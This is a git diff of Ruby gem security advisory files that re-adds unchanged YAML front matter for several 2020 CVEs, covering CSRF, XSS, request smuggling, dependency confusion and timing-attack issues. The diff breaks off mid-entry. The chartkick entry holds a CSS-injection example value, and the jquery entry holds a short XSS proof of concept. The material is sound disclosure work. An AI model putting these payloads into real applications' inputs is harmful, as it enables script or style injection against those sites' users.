-  ghsa: w542-cpp9-r3g7
-  url: https://github.com/ankane/field_test/issues/28
-  title: CSRF Vulnerability with Non-Session Based Authentication
-  date: 2020-08-04
-  description: |
-    The Field Test dashboard is vulnerable to CSRF with non-session based authentication methods.
-
-    ## Impact
-    The Field Test dashboard is vulnerable to CSRF with non-session based authentication methods,
-    like basic authentication. Session-based authentication methods (like Devise's default
-    authentication) are not affected.
-
-    A CSRF attack works by getting an authorized user to visit a malicious website and then
-    performing requests on behalf of the user. In this instance, a single endpoint is affected,
-    which allows for changing the variant assigned to a user.
-  cvss_v3: 4.3
-  unaffected_versions:
-  - "< 0.2.0"
-  patched_versions:
-  - ">= 0.4.0"
----
+---
+layout: advisory
+title: 'CVE-2020-16252 (field_test): CSRF Vulnerability with Non-Session Based Authentication'
+comments: false
+categories:
+- field_test
+advisory:
+  gem: field_test
+  cve: 2020-16252
+  ghsa: w542-cpp9-r3g7
+  url: https://github.com/ankane/field_test/issues/28
+  title: CSRF Vulnerability with Non-Session Based Authentication
+  date: 2020-08-04
+  description: |
+    The Field Test dashboard is vulnerable to CSRF with non-session based authentication methods.
+
+    ## Impact
+    The Field Test dashboard is vulnerable to CSRF with non-session based authentication methods,
+    like basic authentication. Session-based authentication methods (like Devise's default
+    authentication) are not affected.
+
+    A CSRF attack works by getting an authorized user to visit a malicious website and then
+    performing requests on behalf of the user. In this instance, a single endpoint is affected,
+    which allows for changing the variant assigned to a user.
+  cvss_v3: 4.3
+  unaffected_versions:
+  - "< 0.2.0"
+  patched_versions:
+  - ">= 0.4.0"
+---
diff --git a/advisories/_posts/2020-08-04-CVE-2020-16253.md b/advisories/_posts/2020-08-04-CVE-2020-16253.md
index 782659e6..f8f6f424 100644
--- a/advisories/_posts/2020-08-04-CVE-2020-16253.md
+++ b/advisories/_posts/2020-08-04-CVE-2020-16253.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2020-16253 (pghero): CSRF Vulnerability with Non-Session Based Authentication'
-comments: false
-categories:
-- pghero
-advisory:
-  gem: pghero
-  cve: 2020-16253
-  ghsa: v6fx-752r-ccp2
-  url: https://github.com/ankane/pghero/issues/330
-  title: CSRF Vulnerability with Non-Session Based Authentication
-  date: 2020-08-04
-  description: |
-    The PgHero dashboard is vulnerable to CSRF with non-session based authentication methods.
-
-    ## Impact
-    The PgHero dashboard is vulnerable to cross-site request forgery (CSRF). This affects the Docker
-    image, Linux packages, and in specific cases, the Ruby gem. The Ruby gem is vulnerable with
-    non-session based authentication methods like basic authentication - session-based authentication
-    methods (like Devise's default authentication) are not affected.
-
-    A CSRF attack works by getting an authorized user to visit a malicious website and then performing
-    requests on behalf of the user. In this instance, actions include:
-
-    1. Canceling running queries
-    2. Running `EXPLAIN` on queries (without seeing the results, but can be used for denial of service
-       and other attacks)
-    3. Resetting query stats (running `pg_stat_statements_reset()`)
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 2.7.0"
----
+---
+layout: advisory
+title: 'CVE-2020-16253 (pghero): CSRF Vulnerability with Non-Session Based Authentication'
+comments: false
+categories:
+- pghero
+advisory:
+  gem: pghero
+  cve: 2020-16253
+  ghsa: v6fx-752r-ccp2
+  url: https://github.com/ankane/pghero/issues/330
+  title: CSRF Vulnerability with Non-Session Based Authentication
+  date: 2020-08-04
+  description: |
+    The PgHero dashboard is vulnerable to CSRF with non-session based authentication methods.
+
+    ## Impact
+    The PgHero dashboard is vulnerable to cross-site request forgery (CSRF). This affects the Docker
+    image, Linux packages, and in specific cases, the Ruby gem. The Ruby gem is vulnerable with
+    non-session based authentication methods like basic authentication - session-based authentication
+    methods (like Devise's default authentication) are not affected.
+
+    A CSRF attack works by getting an authorized user to visit a malicious website and then performing
+    requests on behalf of the user. In this instance, actions include:
+
+    1. Canceling running queries
+    2. Running `EXPLAIN` on queries (without seeing the results, but can be used for denial of service
+       and other attacks)
+    3. Resetting query stats (running `pg_stat_statements_reset()`)
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 2.7.0"
+---
diff --git a/advisories/_posts/2020-08-04-CVE-2020-16254.md b/advisories/_posts/2020-08-04-CVE-2020-16254.md
index 82c76369..1f3791ce 100644
--- a/advisories/_posts/2020-08-04-CVE-2020-16254.md
+++ b/advisories/_posts/2020-08-04-CVE-2020-16254.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2020-16254 (chartkick): CSS injection with width and height options'
-comments: false
-categories:
-- chartkick
-advisory:
-  gem: chartkick
-  cve: 2020-16254
-  ghsa: 3j95-fjv2-3m4p
-  url: https://github.com/ankane/chartkick/issues/546
-  title: CSS injection with width and height options
-  date: 2020-08-04
-  description: |
-    Chartkick is vulnerable to CSS injection
-    if user input is passed to the width or height option.
-
-    <%= line_chart data, width: params[:width], height: params[:height] %>
-
-    An attacker can set additional CSS properties, like:
-
-    <%= line_chart data, width: "100%; background-image: url('http://example.com/image.png')" %>
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 3.4.0"
----
+---
+layout: advisory
+title: 'CVE-2020-16254 (chartkick): CSS injection with width and height options'
+comments: false
+categories:
+- chartkick
+advisory:
+  gem: chartkick
+  cve: 2020-16254
+  ghsa: 3j95-fjv2-3m4p
+  url: https://github.com/ankane/chartkick/issues/546
+  title: CSS injection with width and height options
+  date: 2020-08-04
+  description: |
+    Chartkick is vulnerable to CSS injection
+    if user input is passed to the width or height option.
+
+    <%= line_chart data, width: params[:width], height: params[:height] %>
+
+    An attacker can set additional CSS properties, like:
+
+    <%= line_chart data, width: "100%; background-image: url('http://example.com/image.png')" %>
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 3.4.0"
+---
diff --git a/advisories/_posts/2020-09-01-CVE-2012-6708.md b/advisories/_posts/2020-09-01-CVE-2012-6708.md
index 5933fbaa..4d6a9256 100644
--- a/advisories/_posts/2020-09-01-CVE-2012-6708.md
+++ b/advisories/_posts/2020-09-01-CVE-2012-6708.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2012-6708 (jquery-rails): Cross-Site Scripting in jquery'
-comments: false
-categories:
-- jquery-rails
-- rails
-advisory:
-  gem: jquery-rails
-  framework: rails
-  cve: 2012-6708
-  ghsa: 2pqj-h3vj-pqgw
-  url: https://nvd.nist.gov/vuln/detail/cve-2012-6708
-  title: Cross-Site Scripting in jquery
-  date: 2020-09-01
-  description: |
-    Affected versions of `jquery` are vulnerable to cross-site scripting.
-    This occurs because the main `jquery` function uses a regular expression
-    to differentiate between HTML and selectors, but does not properly anchor
-    the regular expression. The result is that `jquery` may interpret HTML
-    as selectors when given certain inputs, allowing for client side code
-    execution.
-
-    ## Proof of Concept
-    $("#log").html(
-        $("element[attribute='<img src=\"x\" onerror=\"alert(1)\" />']").html()
-    );
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - "~> 2.1.4"
-  - ">= 2.2.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/cve-2012-6708
-    - https://github.com/rails/jquery-rails/blob/v2.1.4/vendor/assets/javascripts/jquery.js#L59
-    - https://github.com/rails/jquery-rails/blob/v2.2.0/vendor/assets/javascripts/jquery.js#L67
-    - https://github.com/advisories/GHSA-2pqj-h3vj-pqgw
-  notes: Found 2 jquery-rails in GHSA database.
----
+---
+layout: advisory
+title: 'CVE-2012-6708 (jquery-rails): Cross-Site Scripting in jquery'
+comments: false
+categories:
+- jquery-rails
+- rails
+advisory:
+  gem: jquery-rails
+  framework: rails
+  cve: 2012-6708
+  ghsa: 2pqj-h3vj-pqgw
+  url: https://nvd.nist.gov/vuln/detail/cve-2012-6708
+  title: Cross-Site Scripting in jquery
+  date: 2020-09-01
+  description: |
+    Affected versions of `jquery` are vulnerable to cross-site scripting.
+    This occurs because the main `jquery` function uses a regular expression
+    to differentiate between HTML and selectors, but does not properly anchor
+    the regular expression. The result is that `jquery` may interpret HTML
+    as selectors when given certain inputs, allowing for client side code
+    execution.
+
+    ## Proof of Concept
+    $("#log").html(
+        $("element[attribute='<img src=\"x\" onerror=\"alert(1)\" />']").html()
+    );
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - "~> 2.1.4"
+  - ">= 2.2.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/cve-2012-6708
+    - https://github.com/rails/jquery-rails/blob/v2.1.4/vendor/assets/javascripts/jquery.js#L59
+    - https://github.com/rails/jquery-rails/blob/v2.2.0/vendor/assets/javascripts/jquery.js#L67
+    - https://github.com/advisories/GHSA-2pqj-h3vj-pqgw
+  notes: Found 2 jquery-rails in GHSA database.
+---
diff --git a/advisories/_posts/2020-09-09-CVE-2020-15169.md b/advisories/_posts/2020-09-09-CVE-2020-15169.md
index 994055e7..ef0023b9 100644
--- a/advisories/_posts/2020-09-09-CVE-2020-15169.md
+++ b/advisories/_posts/2020-09-09-CVE-2020-15169.md
@@ -1,51 +1,51 @@
----
-layout: advisory
-title: 'CVE-2020-15169 (actionview): Potential XSS vulnerability in Action View'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2020-15169
-  ghsa: cfjv-5498-mph5
-  url: https://groups.google.com/g/rubyonrails-security/c/b-C9kSGXYrc
-  title: Potential XSS vulnerability in Action View
-  date: 2020-09-09
-  description: |
-    There is a potential Cross-Site Scripting (XSS) vulnerability in Action
-    View's translation helpers. Views that allow the user to control the
-    default (not found) value of the `t` and `translate` helpers could be
-    susceptible to XSS attacks.
-
-    Impact
-    ------
-
-    When an HTML-unsafe string is passed as the default for a missing
-    translation key [named `html` or ending in `_html`](https://guides.rubyonrails.org/i18n.html#using-safe-html-translations),
-    the default string is incorrectly marked as HTML-safe and not escaped.
-    Vulnerable code may look like the following examples:
-
-    ```erb
-    <%# The welcome_html translation is not defined for the current locale: %>
-    <%= t("welcome_html", default: untrusted_user_controlled_string) %>
-
-    <%# Neither the title.html translation nor the missing.html translation is defined for the current locale: %>
-    <%= t("title.html", default: [:"missing.html", untrusted_user_controlled_string]) %>
-    ```
-
-    Workarounds
-    -----------
-    Impacted users who can’t upgrade to a patched Rails version can avoid
-    this issue by manually escaping default translations with the
-    `html_escape` helper (aliased as `h`):
-
-    ```erb
-    <%= t("welcome_html", default: h(untrusted_user_controlled_string)) %>
-    ```
-  cvss_v3: 5.4
-  patched_versions:
-  - "~> 5.2.4, >= 5.2.4.4"
-  - ">= 6.0.3.3"
----
+---
+layout: advisory
+title: 'CVE-2020-15169 (actionview): Potential XSS vulnerability in Action View'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2020-15169
+  ghsa: cfjv-5498-mph5
+  url: https://groups.google.com/g/rubyonrails-security/c/b-C9kSGXYrc
+  title: Potential XSS vulnerability in Action View
+  date: 2020-09-09
+  description: |
+    There is a potential Cross-Site Scripting (XSS) vulnerability in Action
+    View's translation helpers. Views that allow the user to control the
+    default (not found) value of the `t` and `translate` helpers could be
+    susceptible to XSS attacks.
+
+    Impact
+    ------
+
+    When an HTML-unsafe string is passed as the default for a missing
+    translation key [named `html` or ending in `_html`](https://guides.rubyonrails.org/i18n.html#using-safe-html-translations),
+    the default string is incorrectly marked as HTML-safe and not escaped.
+    Vulnerable code may look like the following examples:
+
+    ```erb
+    <%# The welcome_html translation is not defined for the current locale: %>
+    <%= t("welcome_html", default: untrusted_user_controlled_string) %>
+
+    <%# Neither the title.html translation nor the missing.html translation is defined for the current locale: %>
+    <%= t("title.html", default: [:"missing.html", untrusted_user_controlled_string]) %>
+    ```
+
+    Workarounds
+    -----------
+    Impacted users who can’t upgrade to a patched Rails version can avoid
+    this issue by manually escaping default translations with the
+    `html_escape` helper (aliased as `h`):
+
+    ```erb
+    <%= t("welcome_html", default: h(untrusted_user_controlled_string)) %>
+    ```
+  cvss_v3: 5.4
+  patched_versions:
+  - "~> 5.2.4, >= 5.2.4.4"
+  - ">= 6.0.3.3"
+---
diff --git a/advisories/_posts/2020-09-18-CVE-2020-25739.md b/advisories/_posts/2020-09-18-CVE-2020-25739.md
index 284957f0..d240aba4 100644
--- a/advisories/_posts/2020-09-18-CVE-2020-25739.md
+++ b/advisories/_posts/2020-09-18-CVE-2020-25739.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2020-25739 (gon): Gon gem lack of escaping certain input when outputting
-  as JSON'
-comments: false
-categories:
-- gon
-advisory:
-  gem: gon
-  cve: 2020-25739
-  ghsa: 78vq-9j56-wrfr
-  url: https://github.com/gazay/gon/commit/fe3c7b2191a992386dc9edd37de5447a4e809bc7
-  title: Gon gem lack of escaping certain input when outputting as JSON
-  date: 2020-09-18
-  description: |
-    An issue was discovered in the gon gem before gon-6.4.0 for Ruby. MultiJson
-    does not honor the escape_mode parameter to escape fields as an XSS
-    protection mechanism. To mitigate, json_dumper.rb in gon now does escaping
-    for XSS by default without relying on MultiJson.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 6.4.0"
----
+---
+layout: advisory
+title: 'CVE-2020-25739 (gon): Gon gem lack of escaping certain input when outputting
+  as JSON'
+comments: false
+categories:
+- gon
+advisory:
+  gem: gon
+  cve: 2020-25739
+  ghsa: 78vq-9j56-wrfr
+  url: https://github.com/gazay/gon/commit/fe3c7b2191a992386dc9edd37de5447a4e809bc7
+  title: Gon gem lack of escaping certain input when outputting as JSON
+  date: 2020-09-18
+  description: |
+    An issue was discovered in the gon gem before gon-6.4.0 for Ruby. MultiJson
+    does not honor the escape_mode parameter to escape fields as an XSS
+    protection mechanism. To mitigate, json_dumper.rb in gon now does escaping
+    for XSS by default without relying on MultiJson.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 6.4.0"
+---
diff --git a/advisories/_posts/2020-09-23-GHSA-vp9c-fpxx-744v.md b/advisories/_posts/2020-09-23-GHSA-vp9c-fpxx-744v.md
index f555bc1e..39922d8d 100644
--- a/advisories/_posts/2020-09-23-GHSA-vp9c-fpxx-744v.md
+++ b/advisories/_posts/2020-09-23-GHSA-vp9c-fpxx-744v.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'GHSA-vp9c-fpxx-744v (personnummer): Validation bypass vulnerability'
-comments: false
-categories:
-- personnummer
-advisory:
-  gem: personnummer
-  ghsa: vp9c-fpxx-744v
-  url: https://github.com/personnummer/ruby/security/advisories/GHSA-vp9c-fpxx-744v
-  date: 2020-09-23
-  title: Validation bypass vulnerability
-  description: |
-    # Impact
-    This vulnerability impacts users who rely on the last four digits of personnummer to
-    be a _real_ personnummer.
-
-    # Workaround
-    The issue arises from the regular expression allowing the first three digits in the
-    last four digits of the personnummer to be 000, which is invalid. To mitigate this
-    without upgrading, a check on the last four digits can be made to make sure it's
-    not 000x.
-  patched_versions:
-  - ">= 1.3.1"
-  related:
-    url:
-    - https://github.com/personnummer/ruby/issues/9
-    - https://github.com/personnummer/ruby/pull/10
----
+---
+layout: advisory
+title: 'GHSA-vp9c-fpxx-744v (personnummer): Validation bypass vulnerability'
+comments: false
+categories:
+- personnummer
+advisory:
+  gem: personnummer
+  ghsa: vp9c-fpxx-744v
+  url: https://github.com/personnummer/ruby/security/advisories/GHSA-vp9c-fpxx-744v
+  date: 2020-09-23
+  title: Validation bypass vulnerability
+  description: |
+    # Impact
+    This vulnerability impacts users who rely on the last four digits of personnummer to
+    be a _real_ personnummer.
+
+    # Workaround
+    The issue arises from the regular expression allowing the first three digits in the
+    last four digits of the personnummer to be 000, which is invalid. To mitigate this
+    without upgrading, a check on the last four digits can be made to make sure it's
+    not 000x.
+  patched_versions:
+  - ">= 1.3.1"
+  related:
+    url:
+    - https://github.com/personnummer/ruby/issues/9
+    - https://github.com/personnummer/ruby/pull/10
+---
diff --git a/advisories/_posts/2020-09-29-CVE-2020-25613.md b/advisories/_posts/2020-09-29-CVE-2020-25613.md
index da1959c9..4b2b0f61 100644
--- a/advisories/_posts/2020-09-29-CVE-2020-25613.md
+++ b/advisories/_posts/2020-09-29-CVE-2020-25613.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2020-25613 (webrick): Potential HTTP Request Smuggling Vulnerability in
-  WEBrick'
-comments: false
-categories:
-- webrick
-advisory:
-  gem: webrick
-  cve: 2020-25613
-  ghsa: gwfg-cqmg-cf8f
-  url: https://www.ruby-lang.org/en/news/2020/09/29/http-request-smuggling-cve-2020-25613/
-  title: Potential HTTP Request Smuggling Vulnerability in WEBrick
-  date: 2020-09-29
-  description: |
-    WEBrick was too tolerant against an invalid Transfer-Encoding header. This may lead to
-    inconsistent interpretation between WEBrick and some HTTP proxy servers, which may
-    allow the attacker to "smuggle" a request. See CWE-444 in detail.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.6.1"
----
+---
+layout: advisory
+title: 'CVE-2020-25613 (webrick): Potential HTTP Request Smuggling Vulnerability in
+  WEBrick'
+comments: false
+categories:
+- webrick
+advisory:
+  gem: webrick
+  cve: 2020-25613
+  ghsa: gwfg-cqmg-cf8f
+  url: https://www.ruby-lang.org/en/news/2020/09/29/http-request-smuggling-cve-2020-25613/
+  title: Potential HTTP Request Smuggling Vulnerability in WEBrick
+  date: 2020-09-29
+  description: |
+    WEBrick was too tolerant against an invalid Transfer-Encoding header. This may lead to
+    inconsistent interpretation between WEBrick and some HTTP proxy servers, which may
+    allow the attacker to "smuggle" a request. See CWE-444 in detail.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.6.1"
+---
diff --git a/advisories/_posts/2020-09-30-CVE-2020-36327.md b/advisories/_posts/2020-09-30-CVE-2020-36327.md
index b4c19816..c5cb1a7a 100644
--- a/advisories/_posts/2020-09-30-CVE-2020-36327.md
+++ b/advisories/_posts/2020-09-30-CVE-2020-36327.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2020-36327 (bundler): Dependency Confusion in Bundler with Implicit Private
-  Dependencies'
-comments: false
-categories:
-- bundler
-advisory:
-  gem: bundler
-  cve: 2020-36327
-  ghsa: fp4w-jxhp-m23p
-  date: 2020-09-30
-  url: https://github.com/rubygems/rubygems/issues/3982
-  title: Dependency Confusion in Bundler with Implicit Private Dependencies
-  description: |
-    Bundler 1.16.0 through 2.2.9 and 2.2.11 through 2.2.17 sometimes chooses a
-    dependency source based on the highest gem version number, which means that a
-    rogue gem found at a public source may be chosen, even if the intended choice
-    was a private gem that is a dependency of another private gem that is
-    explicitly depended on by the application.
-  cvss_v3: 8.8
-  patched_versions:
-  - "= 2.2.10"
-  - ">= 2.2.18"
-  unaffected_versions:
-  - "< 1.16.0"
-  related:
-    cve:
-    - 2021-24105
-    url:
-    - https://bundler.io/blog/2021/02/15/a-more-secure-bundler-we-fixed-our-source-priorities.html
-    - https://mensfeld.pl/2021/02/rubygems-dependency-confusion-attack-side-of-things/
-    - https://www.zofrex.com/blog/2021/04/29/bundler-still-vulnerable-dependency-confusion-cve-2020-36327/
-    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24105
-    - https://github.com/rubygems/rubygems/pull/4609
----
+---
+layout: advisory
+title: 'CVE-2020-36327 (bundler): Dependency Confusion in Bundler with Implicit Private
+  Dependencies'
+comments: false
+categories:
+- bundler
+advisory:
+  gem: bundler
+  cve: 2020-36327
+  ghsa: fp4w-jxhp-m23p
+  date: 2020-09-30
+  url: https://github.com/rubygems/rubygems/issues/3982
+  title: Dependency Confusion in Bundler with Implicit Private Dependencies
+  description: |
+    Bundler 1.16.0 through 2.2.9 and 2.2.11 through 2.2.17 sometimes chooses a
+    dependency source based on the highest gem version number, which means that a
+    rogue gem found at a public source may be chosen, even if the intended choice
+    was a private gem that is a dependency of another private gem that is
+    explicitly depended on by the application.
+  cvss_v3: 8.8
+  patched_versions:
+  - "= 2.2.10"
+  - ">= 2.2.18"
+  unaffected_versions:
+  - "< 1.16.0"
+  related:
+    cve:
+    - 2021-24105
+    url:
+    - https://bundler.io/blog/2021/02/15/a-more-secure-bundler-we-fixed-our-source-priorities.html
+    - https://mensfeld.pl/2021/02/rubygems-dependency-confusion-attack-side-of-things/
+    - https://www.zofrex.com/blog/2021/04/29/bundler-still-vulnerable-dependency-confusion-cve-2020-36327/
+    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24105
+    - https://github.com/rubygems/rubygems/pull/4609
+---
diff --git a/advisories/_posts/2020-10-05-CVE-2020-15237.md b/advisories/_posts/2020-10-05-CVE-2020-15237.md
index b754df36..efe74f06 100644
--- a/advisories/_posts/2020-10-05-CVE-2020-15237.md
+++ b/advisories/_posts/2020-10-05-CVE-2020-15237.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2020-15237 (shrine): Possible timing attack in derivation_endpoint'
-comments: false
-categories:
-- shrine
-advisory:
-  gem: shrine
-  cve: 2020-15237
-  ghsa: 5jjv-x4fq-qjwp
-  url: https://github.com/shrinerb/shrine/security/advisories/GHSA-5jjv-x4fq-qjwp
-  date: 2020-10-05
-  title: Possible timing attack in derivation_endpoint
-  description: |
-    ### Impact
-
-    When using the `derivation_endpoint` plugin, it's possible for the attacker to use a timing attack
-    to guess the signature of the derivation URL.
-
-    ### Patches
-
-    The problem has been fixed by comparing sent and calculated signature in constant time, using
-    `Rack::Utils.secure_compare`. Users using the `derivation_endpoint` plugin are urged to upgrade
-    to Shrine 3.3.0 or greater.
-
-    ### Workarounds
-
-    Users of older Shrine versions can apply the following monkey-patch after loading the `derivation_endpoint` plugin:
-
-    ```rb
-    class Shrine
-      class UrlSigner
-        def verify_signature(string, signature)
-          if signature.nil?
-            fail InvalidSignature, "missing \"signature\" param"
-          elsif !Rack::Utils.secure_compare(signature, generate_signature(string))
-            fail InvalidSignature, "provided signature does not match the calculated signature"
-          end
-        end
-      end
-    end
-    ```
-
-    ### References
-
-    You can read more about timing attacks [here](https://en.wikipedia.org/wiki/Timing_attack).
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 3.3.0"
----
+---
+layout: advisory
+title: 'CVE-2020-15237 (shrine): Possible timing attack in derivation_endpoint'
+comments: false
+categories:
+- shrine
+advisory:
+  gem: shrine
+  cve: 2020-15237
+  ghsa: 5jjv-x4fq-qjwp
+  url: https://github.com/shrinerb/shrine/security/advisories/GHSA-5jjv-x4fq-qjwp
+  date: 2020-10-05
+  title: Possible timing attack in derivation_endpoint
+  description: |
+    ### Impact
+
+    When using the `derivation_endpoint` plugin, it's possible for the attacker to use a timing attack
+    to guess the signature of the derivation URL.
+
+    ### Patches
+
+    The problem has been fixed by comparing sent and calculated signature in constant time, using
+    `Rack::Utils.secure_compare`. Users using the `derivation_endpoint` plugin are urged to upgrade
+    to Shrine 3.3.0 or greater.
+
+    ### Workarounds
+
+    Users of older Shrine versions can apply the following monkey-patch after loading the `derivation_endpoint` plugin:
+
+    ```rb
+    class Shrine
+      class UrlSigner
+        def verify_signature(string, signature)
+          if signature.nil?
+            fail InvalidSignature, "missing \"signature\" param"
+          elsif !Rack::Utils.secure_compare(signature, generate_signature(string))
+            fail InvalidSignature, "provided signature does not match the calculated signature"
+          end
+        end
+      end
+    end
+    ```
+
+    ### References
+
+    You can read more about timing attacks [here](https://en.wikipedia.org/wiki/Timing_attack).
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 3.3.0"
+---
diff --git a/advisories/_posts/2020-10-07-CVE-2020-8264.md b/advisories/_posts/2020-10-07-CVE-2020-8264.md
index ffc3a157..d687f347 100644
--- a/advisories/_posts/2020-10-07-CVE-2020-8264.md
+++ b/advisories/_posts/2020-10-07-CVE-2020-8264.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2020-8264 (actionpack): Possible XSS Vulnerability in Action Pack in Development
-  Mode'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2020-8264
-  ghsa: 35mm-cc6r-8fjp
-  url: https://groups.google.com/g/rubyonrails-security/c/yQzUVfv42jk
-  title: Possible XSS Vulnerability in Action Pack in Development Mode
-  date: 2020-10-07
-  description: |
-    There is a possible XSS vulnerability in Action Pack while the application
-    server is in development mode.  This vulnerability is in the Actionable
-    Exceptions middleware.  This vulnerability has been assigned the CVE
-    identifier CVE-2020-8264.
-
-    Versions Affected:  >= 6.0.0
-    Not affected:       < 6.0.0
-    Fixed Versions:     6.0.3.4
-
-    Impact
-    ------
-    When an application is running in development mode, and attacker can send or
-    embed (in another page) a specially crafted URL which can allow the attacker
-    to execute JavaScript in the context of the local application.
-
-    Workarounds
-    -----------
-    Until such time as the patch can be applied, application developers should
-    disable the Actionable Exceptions middleware in their development environment via
-    a line such as this one in their config/environment/development.rb:
-
-    `config.middleware.delete ActionDispatch::ActionableExceptions`
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 6.0.0"
-  patched_versions:
-  - ">= 6.0.3.4"
----
+---
+layout: advisory
+title: 'CVE-2020-8264 (actionpack): Possible XSS Vulnerability in Action Pack in Development
+  Mode'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2020-8264
+  ghsa: 35mm-cc6r-8fjp
+  url: https://groups.google.com/g/rubyonrails-security/c/yQzUVfv42jk
+  title: Possible XSS Vulnerability in Action Pack in Development Mode
+  date: 2020-10-07
+  description: |
+    There is a possible XSS vulnerability in Action Pack while the application
+    server is in development mode.  This vulnerability is in the Actionable
+    Exceptions middleware.  This vulnerability has been assigned the CVE
+    identifier CVE-2020-8264.
+
+    Versions Affected:  >= 6.0.0
+    Not affected:       < 6.0.0
+    Fixed Versions:     6.0.3.4
+
+    Impact
+    ------
+    When an application is running in development mode, and attacker can send or
+    embed (in another page) a specially crafted URL which can allow the attacker
+    to execute JavaScript in the context of the local application.
+
+    Workarounds
+    -----------
+    Until such time as the patch can be applied, application developers should
+    disable the Actionable Exceptions middleware in their development environment via
+    a line such as this one in their config/environment/development.rb:
+
+    `config.middleware.delete ActionDispatch::ActionableExceptions`
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 6.0.0"
+  patched_versions:
+  - ">= 6.0.3.4"
+---
diff --git a/advisories/_posts/2020-10-20-CVE-2020-15269.md b/advisories/_posts/2020-10-20-CVE-2020-15269.md
index e2ae95a9..7aa9b6a3 100644
--- a/advisories/_posts/2020-10-20-CVE-2020-15269.md
+++ b/advisories/_posts/2020-10-20-CVE-2020-15269.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2020-15269 (spree): Ensure that doorkeeper_token is valid when authenticating
-  requests in API v2 calls'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  cve: 2020-15269
-  ghsa: f8cm-364f-q9qh
-  url: https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh
-  date: 2020-10-20
-  title: Ensure that doorkeeper_token is valid when authenticating requests in API
-    v2 calls
-  description: |
-    ### Impact
-
-    The perpetrator who previously obtained an old expired user
-    token could use it to access Storefront API v2 endpoints.
-
-    ### Patches
-
-    Please upgrade to 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version.
-  cvss_v3: 7.4
-  patched_versions:
-  - "~> 3.7.11"
-  - "~> 4.0.4"
-  - ">= 4.1.11"
-  unaffected_versions:
-  - "< 3.7.0"
----
+---
+layout: advisory
+title: 'CVE-2020-15269 (spree): Ensure that doorkeeper_token is valid when authenticating
+  requests in API v2 calls'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  cve: 2020-15269
+  ghsa: f8cm-364f-q9qh
+  url: https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh
+  date: 2020-10-20
+  title: Ensure that doorkeeper_token is valid when authenticating requests in API
+    v2 calls
+  description: |
+    ### Impact
+
+    The perpetrator who previously obtained an old expired user
+    token could use it to access Storefront API v2 endpoints.
+
+    ### Patches
+
+    Please upgrade to 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version.
+  cvss_v3: 7.4
+  patched_versions:
+  - "~> 3.7.11"
+  - "~> 4.0.4"
+  - ">= 4.1.11"
+  unaffected_versions:
+  - "< 3.7.0"
+---
diff --git a/advisories/_posts/2020-10-20-CVE-2020-7670.md b/advisories/_posts/2020-10-20-CVE-2020-7670.md
index 3bf407e6..3e461781 100644
--- a/advisories/_posts/2020-10-20-CVE-2020-7670.md
+++ b/advisories/_posts/2020-10-20-CVE-2020-7670.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2020-7670 (agoo): HTTP Request Smuggling in Agoo'
-comments: false
-categories:
-- agoo
-advisory:
-  gem: agoo
-  cve: 2020-7670
-  ghsa: h385-52j6-9984
-  url: https://github.com/ohler55/agoo/issues/88
-  date: 2020-10-20
-  title: HTTP Request Smuggling in Agoo
-  description: |
-    agoo through 2.12.3 allows request smuggling attacks where agoo is used
-    as a backend and a frontend proxy also being vulnerable. It is possible to conduct
-    HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore,
-    invalid Transfer Encoding headers were found to be parsed as valid which could be
-    leveraged for TE:CL smuggling attacks.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.13.0"
-  related:
-    url:
-    - https://github.com/ohler55/agoo/commit/23d03535cf7b50d679a60a953a0cae9519a4a130
----
+---
+layout: advisory
+title: 'CVE-2020-7670 (agoo): HTTP Request Smuggling in Agoo'
+comments: false
+categories:
+- agoo
+advisory:
+  gem: agoo
+  cve: 2020-7670
+  ghsa: h385-52j6-9984
+  url: https://github.com/ohler55/agoo/issues/88
+  date: 2020-10-20
+  title: HTTP Request Smuggling in Agoo
+  description: |
+    agoo through 2.12.3 allows request smuggling attacks where agoo is used
+    as a backend and a frontend proxy also being vulnerable. It is possible to conduct
